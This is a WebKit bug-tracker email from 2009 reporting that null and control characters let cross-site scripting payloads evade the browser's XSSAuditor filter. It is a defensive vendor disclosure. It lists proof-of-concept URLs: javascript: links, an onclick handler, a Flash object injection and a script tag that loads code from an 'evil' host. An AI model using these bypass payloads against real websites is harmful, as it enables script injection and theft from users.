[Webkit-unassigned] [Bug 27151] New: [XSSAuditor] JavaScript URLs with null/control characters bypass XSSAuditor

bugzilla-daemon at webkit.org bugzilla-daemon at webkit.org
Fri Jul 10 11:16:18 PDT 2009 

https://bugs.webkit.org/show_bug.cgi?id=27151

           Summary: [XSSAuditor] JavaScript URLs with null/control
                    characters bypass XSSAuditor
           Product: WebKit
           Version: 528+ (Nightly build)
          Platform: All
        OS/Version: All
            Status: UNCONFIRMED
          Severity: Normal
          Priority: P2
         Component: WebCore Misc.
        AssignedTo: webkit-unassigned at lists.webkit.org
        ReportedBy: dbates at berkeley.edu
                CC: sam at webkit.org, abarth at webkit.org, dbates at berkeley.edu


Null/control characters in HTTP GET/POST data can bypass XSSAuditor with
respect to JavaScript URLs.

Examples:

JavaScript URL with Null Character:
http://good.webblaze.org/dbates/xsstest.php?q=%3Ca+href%3Djavascript%3Aal%00ert%28/XSS/%29%3EContinue%3C/a%3E

JavaScript URL with Control Character:
http://good.webblaze.org/dbates/xsstest.php?q=%3Ca+href%3Djavascript%3Aalert%28/XSS%05/%29%3EContinue%3C/a%3E

+++ This bug was initially created as a clone of Bug #27071 +++

Null/control characters in HTTP GET/POST data can bypass XSSAuditor with
respect to injected plugin-based objects, inline event handlers, and external
scripts.

Examples:

Plugin-Injection:
http://good.webblaze.org/dbates/xsstest.php?q=%3Cobject%20classid=%22clsid:d27cdb6e-ae6d-11cf-96b8-444553540000%22%20codebase=%22http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab%22%20id=%22flashMov%22%3E%3Cparam%20name=%22movie%22%20value=%22http://evil.webblaze.org/dbates/execGetURL%05.swf%22%20/%3E%3Cparam%20name=%22allowScriptAccess%22%20value=%22always%22%20/%3E%3Cembed%20src=%22http://evil.webblaze.org/dbates/execGetURL%05.swf%22%20name=%22flashMov%22%20allowScriptAccess=%22always%22%20type=%22application/x-shockwave-flash%22%20/%3E%3C/object%3E

Inline Event Handler:
http://good.webblaze.org/dbates/xsstest.php?q=%3Ca%20href=%22about:blank%22%20onclick=%22al%00ert(5)%22%3Ed%3C/a%3E

External Scripts:
http://good.webblaze.org/dbates/xsstest.php?q=<script
src='http://evil.webblaze.org/dbates/xss.js'></script>

-- 
Configure bugmail: https://bugs.webkit.org/userprefs.cgi?tab=email
------- You are receiving this mail because: -------
You are the assignee for the bug.

More information about the webkit-unassigned mailing list